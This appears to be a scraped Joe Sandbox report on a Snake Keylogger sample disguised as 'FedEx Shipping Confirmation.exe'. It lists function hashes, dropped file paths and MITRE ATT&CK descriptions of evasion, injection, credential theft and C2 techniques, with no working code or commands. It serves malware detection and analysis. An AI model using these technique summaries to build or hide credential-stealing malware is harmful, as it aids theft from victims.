Snapshot File: hcaresult_3_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME
API String ID: 2200240437-1106614640
Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction ID: 3d91c3bba12f32b4d8e24f08bfb099957206232b6387f0edcfac50a9fed73821
Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction Fuzzy Hash: 80F0F671501219ABDB20BB68DD0EF9B376CAB00304F10447AA546F10E0EB789B69CB98

Function 00111999 Relevance: 5.1, Strings: 4, Instructions: 119COMMON

Download Yara Rule

Strings

F, xrefs: 00111A90
F, xrefs: 00111AC7
F, xrefs: 001119C7
F, xrefs: 00111AE4

Memory Dump Source

Source File: 00000003.00000002.8110758083.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_110000_FedEx Shipping Confirmation.jbxd

Similarity

API ID:
String ID: F$F$F$F
API String ID: 0-1844600021
Opcode ID: e9d03af5af3c4fb167224924d158e3c02b38f408096b3b9e47f4f610a6f16cef
Instruction ID: 6b62b7f9fb1b575790c0e069e6a5afee12365182a33e49c7e6c0530ee76e3783
Opcode Fuzzy Hash: e9d03af5af3c4fb167224924d158e3c02b38f408096b3b9e47f4f610a6f16cef
Instruction Fuzzy Hash: 9B419D34E053599FCB0AEFB8D4516EEBBB2EF8A304F1044A9D004AB396CB745D85DB91

Function 00111B90 Relevance: 5.1, Strings: 4, Instructions: 65COMMON

Download Yara Rule

Strings

F, xrefs: 00111C22
T, xrefs: 00111B9C
F, xrefs: 00111BF8
F, xrefs: 00111C3F

Memory Dump Source

Source File: 00000003.00000002.8110758083.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_110000_FedEx Shipping Confirmation.jbxd

Similarity

API ID:
String ID: T$F$F$F
API String ID: 0-3026544444
Opcode ID: 0f7650dfd04598ec298f7deea78bf0d7428248cc7e12b521d9e947d32dccd3e5
Instruction ID: 5ea18408fa147ae62433e1cf28a9dc048f6ef34906cf7d8394ca3e00ead8b302
Opcode Fuzzy Hash: 0f7650dfd04598ec298f7deea78bf0d7428248cc7e12b521d9e947d32dccd3e5
Instruction Fuzzy Hash: 5E215E38E002089BDB09EFA9D4517EEB7B2FB86304F0084B9D4149B399DB745A85CF82

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FedEx Shipping Confirmation.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Kustodens.Emp

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Roundness.ind

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\bucrane.erh

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\freemanship.txt

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\kildent.Ocu

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\pressurization.pra

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\restriktivitets.bnk

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\tresindstyvendedeles.ord

C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\LangDLL.dll

C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\System.dll

C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\UserInfo.dll

C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\nsDialogs.dll

C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\nsExec.dll

Static File Info

General

Windows Analysis Report
FedEx Shipping Confirmation.exe

Function 0040352F Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 464
stringfilecomCOMMON

Function 00405C60 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 00403FD4 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Function 00403C26 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 004030A2 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Function 00406591 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204
stringCOMMON

Function 004055D9 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 004032D9 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 161
COMMON

Function 004068D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Function 6ED21817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Function 00406073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Function 00406422 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Function 6ED21058 Relevance: 4.6, APIs: 3, Instructions: 55
memoryCOMMON

Function 6ED21774 Relevance: 3.8, APIs: 3, Instructions: 53
COMMON

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre